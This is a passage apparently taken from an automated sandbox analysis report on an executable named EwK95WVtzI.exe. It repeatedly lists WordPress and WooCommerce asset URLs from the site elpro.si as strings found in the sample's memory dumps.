00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-publ
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-publi
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/cart_widget.min.js?ver=5.2.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/front-scripts.min.js?ver=5.2.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 